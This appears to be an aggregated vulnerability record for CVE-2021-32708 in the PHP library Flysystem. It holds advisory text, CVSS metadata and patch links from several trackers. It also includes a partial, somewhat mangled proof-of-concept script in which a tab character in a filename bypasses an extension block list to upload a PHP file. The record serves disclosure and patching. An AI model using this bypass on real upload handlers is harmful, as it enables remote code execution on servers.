Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.
{"id": "CVE-2021-32708", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-32708", "description": "Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.", "published": "2021-06-24T17:15:00", "modified": "2021-09-20T18:50:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32708", "reporter": "security-advisories@github.com", "references": ["https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "https://packagist.org/packages/league/flysystem", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/"], "cvelist": ["CVE-2021-32708"], "immutableFields": [], "lastseen": "2022-03-23T18:32:18", "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-32708"]}, {"type": "fedora", "idList": ["FEDORA:0479630ADA76", "FEDORA:E0B4F305D42D"]}, {"type": "github", "idList": ["GHSA-9F46-5R25-5WFM"]}, {"type": "osv", "idList": ["OSV:GHSA-9F46-5R25-5WFM"]}, {"type": "srcincite", "idList": ["SRC-2021-0021"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-32708"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-32708"]}, {"type": "fedora", "idList": ["FEDORA:0479630ADA76", "FEDORA:E0B4F305D42D"]}, {"type": "github", "idList": ["GHSA-9F46-5R25-5WFM"]}, {"type": "srcincite", "idList": ["SRC-2021-0021"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-32708"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "GitHub, Inc.", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 9.8}}}, "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"], "cwe": ["CWE-367"], "affectedSoftware": [{"cpeName": "thephpleague:flysystem", "version": "1.1.4", "operator": "lt", "name": "thephpleague flysystem"}, {"cpeName": "thephpleague:flysystem", "version": "2.1.1", "operator": "lt", "name": "thephpleague flysystem"}, {"cpeName": "fedoraproject:fedora", "version": "33", "operator": "eq", "name": "fedoraproject fedora"}, {"cpeName": "fedoraproject:fedora", "version": "34", "operator": "eq", "name": "fedoraproject fedora"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:thephpleague:flysystem:1.1.4:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.1.4", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:thephpleague:flysystem:2.1.1:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.1", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "name": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "name": "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "name": "https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "refsource": "CONFIRM", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://packagist.org/packages/league/flysystem", "name": "https://packagist.org/packages/league/flysystem", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "name": "FEDORA-2021-717516a2e9", "refsource": "FEDORA", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/", "name": "FEDORA-2021-b9187c535c", "refsource": "FEDORA", "tags": ["Mailing List", "Third Party Advisory"]}]}
{"github": [{"lastseen": "2022-04-19T19:30:00", "description": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T03:13:28", "type": "github", "title": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2022-04-19T19:03:01", "id": "GHSA-9F46-5R25-5WFM", "href": "https://github.com/advisories/GHSA-9f46-5r25-5wfm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-02-27T09:44:57", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of League flysystem. Authentication may not be required to exploit this vulnerability. The specific flaw exists within the removeFunkyWhiteSpace function. The issue results from a change in the supplied filename which can introduce a time-of-check time-of-use condition. An attacker can leverage this vulnerability to write arbitrary files on a target web server.\n\n**Affected Vendors:**\n\nLeague\n\n**Affected Products:**\n\nflysystem\n\n**Vendor Response:**\n\nLeague has issued an update to correct this vulnerability. More details can be found at: <https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "srcincite", "title": "SRC-2021-0021 : League flysystem removeFunkyWhiteSpace Time-Of-Check Time-Of-Use File Write Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-23T00:00:00", "id": "SRC-2021-0021", "href": "https://srcincite.io/advisories/src-2021-0021/", "sourceData": "assertAbsent($path);\r\n $config = $this->prepareConfig($config);\r\n\r\n Util::rewindStream($resource);\r\n return (bool) $this->getAdapter()->writeStream($path, $resource, $config);\r\n }\r\n\r\n public function assertAbsent($path)\r\n {\r\n if ($this->config->get('disable_asserts', false) === false && $this->has($path)) {\r\n throw new FileExistsException($path); // whoops\r\n }\r\n }\r\n```\r\n\r\nAt [1] the `normalizePath` method is called:\r\n\r\n```php\r\nclass Util\r\n{\r\n //...\r\n\r\n public static function normalizePath($path)\r\n {\r\n return static::normalizeRelativePath($path); // 2\r\n }\r\n\r\n public static function normalizeRelativePath($path)\r\n {\r\n $path = str_replace('\\\\', '/', $path);\r\n $path = static::removeFunkyWhiteSpace($path); // 3\r\n\r\n $parts = [];\r\n\r\n foreach (explode('/', $path) as $part) {\r\n switch ($part) {\r\n case '':\r\n case '.':\r\n break;\r\n\r\n case '..':\r\n if (empty($parts)) {\r\n throw new LogicException(\r\n 'Path is outside of the defined root, path: [' . $path . ']'\r\n );\r\n }\r\n array_pop($parts);\r\n break;\r\n\r\n default:\r\n $parts[] = $part;\r\n break;\r\n }\r\n }\r\n\r\n return implode('/', $parts);\r\n }\r\n```\r\n\r\nThe code calls `normalizeRelativePath` with the attackers supplied filename at [2] and then calls the `removeFunkyWhiteSpace` function at [3]. Let's investigate this function defined in the same class:\r\n\r\n```php\r\n protected static function removeFunkyWhiteSpace($path) {\r\n // We do this check in a loop, since removing invalid unicode characters\r\n // can lead to new characters being created.\r\n while (preg_match('#\\p{C}+|^\\./#u', $path)) {\r\n $path = preg_replace('#\\p{C}+|^\\./#u', '', $path);\r\n }\r\n\r\n return $path;\r\n }\r\n```\r\n\r\nIn summary the code is stripping the filename of any non-printable characters (invisible control characters and unused code points 0x00\u20130x1F and 0x7F\u20130x9F) which can be used to bypass block list checks. But definitely props for the .. check ;-)\r\n\r\n# Bonus:\r\n\r\nThe `assertAbsent` call will throw a `FileExistsException` which leaks the full path of the web root to an attacker if the same file is uploaded. You probably want to fix that information disclosure bug too.\r\n\r\n# Example:\r\n\r\nresearcher@neophyte:~$ php poc.php\r\n(+) vuln\r\n*/\r\n\r\nrequire __DIR__.'/vendor/autoload.php';\r\nif (file_exists(\"output/si.php\")) unlink(\"output/si.php\");\r\n\r\n$blocklist = [\r\n 'php',\r\n 'php3',\r\n 'php4',\r\n 'php5',\r\n 'phtml',\r\n 'cgi',\r\n 'pl',\r\n 'sh',\r\n 'com',\r\n 'bat',\r\n '',\r\n 'py',\r\n 'rb',\r\n];\r\n\r\n// this would be the attack coming from over the web\r\n$filename = \"si.\\x09php\";\r\n$d = pathinfo($filename);\r\nif (in_array($d[\"extension\"], $blocklist, true)) die(\"(-) blocked, nice try attacker!\\r\\n\");\r\n$adapter = new League\\Flysystem\\Local\\LocalFilesystemAdapter(__DIR__.'/output');\r\n$filesystem = new League\\Flysystem\\Filesystem($adapter);\r\n$str = \"writeStream($filename, $stream);\r\necho file_exists(\"output/si.php\") == true ? \"(+) vuln\\r\\n\" : \"(+) not vuln\\r\\n\";\r\n?>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2021-0021.php.txt"}], "osv": [{"lastseen": "2022-05-11T21:40:55", "description": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T03:13:28", "type": "osv", "title": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-09-21T14:55:38", "id": "OSV:GHSA-9F46-5R25-5WFM", "href": "https://osv.dev/vulnerability/GHSA-9f46-5r25-5wfm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Flysystem is a filesystem abstraction which allows you to easily swap out a local filesystem for a remote one. Autoloader: /usr/share/php/League/Flysystem/autoload.php ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-04T01:09:20", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: php-league-flysystem-1.1.4-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-07-04T01:09:20", "id": "FEDORA:0479630ADA76", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Flysystem is a filesystem abstraction which allows you to easily swap out a local filesystem for a remote one. Autoloader: /usr/share/php/League/Flysystem/autoload.php ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-04T01:08:10", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: php-league-flysystem-1.1.4-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-07-04T01:08:10", "id": "FEDORA:E0B4F305D42D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-01-22T11:31:03", "description": "Flysystem is an open source file storage library for PHP. The whitespace\nnormalisation using in 1.x and 2.x removes any unicode whitespace. Under\ncertain specific conditions this could potentially allow a malicious user\nto execute code remotely. The conditions are: A user is allowed to supply\nthe path or filename of an uploaded file, the supplied path or filename is\nnot checked against unicode chars, the supplied pathname checked against an\nextension deny-list, not an allow-list, the supplied path or filename\ncontains a unicode whitespace char in the extension, the uploaded file is\nstored in a directory that allows PHP code to be executed. Given these\nconditions are met a user can upload and execute arbitrary code on the\nsystem under attack. The unicode whitespace removal has been replaced with\na rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users,\nupgrade to 2.1.1.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-24T00:00:00", "type": "ubuntucve", "title": "CVE-2021-32708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-24T00:00:00", "id": "UB:CVE-2021-32708", "href": "https://ubuntu.com/security/CVE-2021-32708", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-04T06:01:38", "description": "Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T17:15:00", "type": "debiancve", "title": "CVE-2021-32708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-24T17:15:00", "id": "DEBIANCVE:CVE-2021-32708", "href": "https://security-tracker.debian.org/tracker/CVE-2021-32708", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-32708
